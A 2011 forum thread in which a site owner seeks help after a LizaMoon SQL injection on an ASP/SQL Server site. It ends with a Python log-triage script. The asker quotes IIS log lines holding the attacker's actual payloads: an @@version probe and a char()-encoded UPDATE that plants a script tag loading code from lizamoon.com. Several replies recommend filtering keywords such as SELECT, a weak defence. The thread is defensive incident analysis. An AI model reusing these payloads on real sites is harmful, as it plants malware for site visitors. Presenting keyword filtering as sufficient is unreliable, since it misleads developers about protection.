garnett-dickinson

Recent SQL Injection Attack

Hi,

Found out recently that my website (ASP and SQL Server database) has been attacked by SQL Injection. It has inserted a script link to lizamoon.com/ur.php into database fields that are either 'text' or 'nvarchar' fields.

Searching in Google reveals that a lot of other ASP and ASP.NET sites have been hit as well.

I have now cleared out the database.

Has anyone got any suggestions of how to make sure this does not happen again, or has anyone else had this exact attack happen to them, and how and what have they done to prevent this?

Thanks in advance for your most grateful help.
Aaron Shilo

Hello

This is a very common problem being faced by webmasters who are running websites coded long back. The major issue in these websites is that the code doesn't validate input from the user before passing it to the data servers.

The solution is to use stored procedures instead of direct SQL statements. Or else, validate inputs before passing them to your queries. Avoid keywords like ";, select, update, insert, delete" etc. from the user inputs.

These are the very basic pointers to start working on it. If you are not a programmer, you will need to hire a programmer to handle this issue for you.

Let me know if I can help any further on this issue.

Sounds like it is also 'cross-site scripting', which you might also want to look into.
ASKER CERTIFIED SOLUTION
worthyking1

garnett-dickinson

ASKER

I have just noticed that it has happened again, not as many fields this time. I can't alter some of the scripts that I have on the site as they are part of an off-the-shelf shopping cart package that we've purchased. However, it has also affected tables in the database that are not part of the shopping cart package.

What is even more strange is that it is the only database that has been affected on this SQL Server, 1 out of 4 databases. I have also changed FTP and admin passwords since the first attack.

This is leading me to believe that this is not SQL injection, unless some people think otherwise.
I have just noticed (just after the second attack) the difference between the SQL Server database that was hit and the ones on the same server that were not: it was the permissions of the database. I had got 'Delete', 'Execute', 'Insert', and 'Select' ticked. I have not got them ticked in my other database and I can still add, update, etc. in my webpages.
I still believe it is SQL injection.

Would you like to share the URL to look into?
Sorry, do you mean the URL of the site that got attacked?
Yes, the URL of the site which is attacked, so that we can look into the security loopholes in it.
Hello,

Here are 4 very useful links from OWASP:

http://www.owasp.org/index.php/SQL_Injection
http://www.owasp.org/index.php/Guide_to_SQL_Injection
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

I use another strategy when programming ASP.NET applications: I use a data persistence framework such as Gentle Framework that completely protects against SQL injection, even if it is not the purpose at all of this kind of framework.
I have looked over the logs and found out which page they have used to inject the script code:

2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax)

I have looked further into it and found a few entries using the highlighted IP address, which I suspect is to find out which page they can use:

2011-02-11 08:26:05 <<my server ip>> GET /<<my page>>.asp prod=MG0011'+or+1=@@version--|11|80040e07|Conversion_failed_when_converting_the_nvarchar_value_'Microsoft_SQL_Server_2008_(RTM)_-_10.0.1600.22_(X64)__+Jul__9_2008_14:17:44__+Copyright_(c)_1988-2008_Microsoft_Corporation_+Web_Edition_(64-bit)_on_Windows_NT_5.2_<X64>_(Build_3790:_Service_Pack_2)_'_to_data_type_int. 80 - 95.64.9.18 HTTP/1.1

I have now put in a script which removes 'bad words' such as 'SELECT', 'INSERT', 'UPDATE', etc. from the query string passed to this page.

I'd rather not share the URL, thanks.
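
A log-triage sketch for the two entries quoted in the thread above, added here as an example and not code from any poster: it URL-decodes the query field, flags the injection markers those entries show, and turns char(N)+char(N) chains back into readable text. The sample lines, IP addresses and page name are constructed, and the field positions assume the same IIS W3C layout as the thread's log.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C lines modelled on the two entries quoted in the thread
# (documentation IPs, hypothetical page name, char() chain cut to 8 values).
SAMPLE_LOG = [
    "2011-03-29 17:56:49 192.0.2.10 GET /product.asp prod=MG0011'+update+tblMembers"
    "+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)"
    "%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)+as+"
    "varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 198.51.100.7 HTTP/1.1 Mozilla/5.0",
    "2011-02-11 08:26:05 192.0.2.10 GET /product.asp prod=MG0011'+or+1=@@version--"
    "|11|80040e07|Conversion_failed_when_converting 80 - 198.51.100.7 HTTP/1.1 -",
    "2011-03-29 18:02:11 192.0.2.10 GET /product.asp prod=MG0011 80 - 203.0.113.5 HTTP/1.1 -",
]

# \b keeps "varchar(8000)" from being read as a char() call.
CHAR_CHAIN = re.compile(r"\bchar\(\d+\)(?:\s*\+\s*\bchar\(\d+\))*", re.I)
RULES = {
    "sql-after-quote": re.compile(r"'\s*(?:update|insert|delete|exec|or)\b", re.I),
    "version-probe": re.compile(r"@@version", re.I),
    "char-encoded-string": CHAR_CHAIN,
    "trailing-comment": re.compile(r"--\s*(?:\||$)"),
    # Classic ASP appends |line|error|text to the logged query when a page fails.
    "db-error-in-log": re.compile(r"\|\d+\|80040e[0-9a-f]{2}\|", re.I),
}

def decode_char_chains(sql):
    """Replace char(60)+char(47)+... with the quoted string it builds."""
    def to_text(m):
        return "'" + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))) + "'"
    return CHAR_CHAIN.sub(to_text, sql)

def triage(line):
    """Return (client_ip, rule names hit, readable query) for one log line."""
    f = line.split()
    # Field order: date time s-ip method uri-stem uri-query port username c-ip ...
    query, client_ip = unquote_plus(f[5]), f[8]
    hits = sorted(name for name, rx in RULES.items() if rx.search(query))
    return client_ip, hits, decode_char_chains(query)

def suspicious_clients(lines):
    """Map each client IP to the set of rules its requests triggered."""
    seen = {}
    for line in lines:
        ip, hits, _ = triage(line)
        if hits:
            seen.setdefault(ip, set()).update(hits)
    return seen

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(triage(entry))
```

Grouping hits by client IP ties the earlier `@@version` probe to the later `update` request, which gives the time window to check for other affected pages and tables.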